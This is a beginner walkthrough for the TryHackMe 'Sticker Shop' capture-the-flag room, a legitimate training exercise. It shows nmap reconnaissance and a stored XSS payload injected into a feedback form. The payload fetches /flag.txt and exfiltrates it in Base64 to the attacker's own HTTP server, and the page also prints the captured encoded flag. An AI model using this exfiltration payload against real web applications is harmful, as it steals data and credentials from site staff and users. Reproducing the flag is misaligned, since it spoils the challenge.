The Sticker Shop Motion Graphics TryHackMe Writeup | Beginner Friendly | Detailed Walkthrough | SuNnY
Motions graphics writeup for TryHackme Room → [ The Sticker Shop ]
Thanks to the Creators of this Room —
ROOM TYPE :
Difficulty → Easy
[ Name : The Sticker Room ]
This is a Free Room. Anyone can deploy virtual machines in the room
(without being subscribed)!
ROOM OBJECTIVES →
What is the content of flag.txt?
Let’s Fire Up the Machine 🔥
Saving IP to Hosts File
Let’s begin with adding the ip address to the Hosts file
and give it a domain name → thestickershop.thm ( This can be anything )
echo "IP-OF-YOUR-MACHINE thestickershop.thm" | sudo tee -a /etc/hosts
Other Way :
** You can use any text editor for this , VIM , subl , etc →
nano /etc/hosts
IP-ADDRESS-OF-YOUR-MACHINE thestickershop.thm
( Control + X and Y [yes] for saving the file )
Dont forget to add your machine’s ip address instead of —
“IP-ADDRESS-OF-YOUR-MACHINE”
Initial Reconnaissance ( Nmap Scan )
nmap -sVC -T4 thestickershop.thm -oN nmapscan.txt
Nmap scan report for thestickershop.thm (IP Redacted)
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9
(Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
|_ 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
8080/tcp open http-proxy Werkzeug/3.0.1 Python/3.8.10
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.1 Python/3.8.10
| Date: << Redacted >>
| Content-Type: text/html; charset=utf-8
| Content-Length: 1655
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>Cat Sticker Shop</title>
| <style>
| body {
| font-family: Arial, sans-serif;
| margin: 0;
| padding: 0;
| header {
| background-color: #333;
| color: #fff;
| text-align: center;
| padding: 10px;
| header ul {
| list-style: none;
| padding: 0;
| header li {
| display: inline;
| margin-right: 20px;
| header a {
| text-decoration: none;
| color: #fff;
| font-weight: bold;
| .content {
| padding: 20px;
|_ .product {
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint
at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=12/19%Time=6763F7D2%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,726,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.0\.1
SF:\x20Python/3\.8\.10\r\nDate:\x20Thu,\x2019\x20Dec\x202024\x2010:39:12\x
SF:20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length
SF::\x201655\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<h
SF:ead>\n\x20\x20\x20\x20<title>Cat\x20Sticker\x20Shop</title>\n\x20\x20\x
SF:20\x20<style>\n\x20\x20\x20\x20\x20\x20\x20\x20body\x20{\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20Arial,\x20sans-serif
SF:;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20padding:\x200;\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20header\x20{\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#333;
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#fff;\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20text-align:\x20center;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20padding:\x2010px;\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20header\x20u
SF:l\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20list-style:\x20
SF:none;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20padding:\x200;\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20head
SF:er\x20li\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:
SF:\x20inline;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin-rig
SF:ht:\x2020px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20header\x20a\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20text-decoration:\x20none;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20color:\x20#fff;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20font-weight:\x20bold;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\.content\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20padding:\x2020px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20\.product\x20{\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20bo");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.53 seconds
Found Two Open Ports →
Port 22/TCP SSH
andPort 8080/TCP HTTP
→
Let’s Check the Port 8080 →
http://thestickershop.thm:8080/
We see two images →
Cat Sticker 1
andCat Sticker 2
on →
http://thestickershop.thm:8080/
After Exploring the HTTP port , There is a Feedback Form found →
The Submit Feedback Page enables users to provide comments via a feedback form featuring a textarea input field, which submits data through a POST request to the
/submit_feedback
endpoint. Upon successful submission, users receive the confirmation message: "Thanks for your feedback! It will be evaluated shortly by our staff." However, the acceptance of user-supplied input introduces potential security risks, such as Cross-Site Scripting (XSS). To mitigate these risks, it is essential to implement robust input sanitization, enforce a Content Security Policy (CSP) to block unauthorized scripts, and validate inputs on both client and server sides. Proper encoding and escaping techniques should also be applied to ensure secure processing and rendering of user data, safeguarding the application against injection attacks.
Objective for the room is to find Flag Value From this Path →
http://thestickershop.thm:8080/flag.txt
We are going to start a HTTP Server on Port 8081 From our Local machine →
We will develop a JavaScript payload engineered to intercept and exfiltrate the response from a
fetch
request targeting the root path (/
) of the current origin. This payload utilizes thebtoa()
function to encode the text content of the fetched response into Base64 format. The encoded data is then exfiltrated to a remote server athttp://Your-IP(tun0)/
via an additionalfetch
request. To bypass Cross-Origin Resource Sharing (CORS) restrictions, the payload specifiesmode: 'no-cors'
. Additionally, it includes thecredentials: 'same-origin'
directive in the initialfetch
request to ensure cookies and other credentials are transmitted, potentially exposing sensitive information from the target application.
<script>
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})
.then(response => response.text())
.then(text => {
fetch('http://Your-tun0-IP:PortNumber/' + btoa(text), {mode:'no-cors'});
});
</script>
Replace the Your-tun0-IP with your VM’s IP → ( ifconfig > tun0 ) and replace the PortNumber with the port we are about to start an HTTP Server
Upon the successful execution of the payload into the Feedback Form , a reverse connection is initiated to our web server in the Form of GET responnse and returned as an encoded Base64 String, confirming the establishment of a callback and validating the success of the operation.
Here are the Full Steps shown using Motion Graphics →
We found a Base64 string inside the GET Response on the HTTP Server →
/VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9
There are Two way to Decode the Base64 String →
1. Decoding the String using the CLI →
echo "VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9" | base64 -d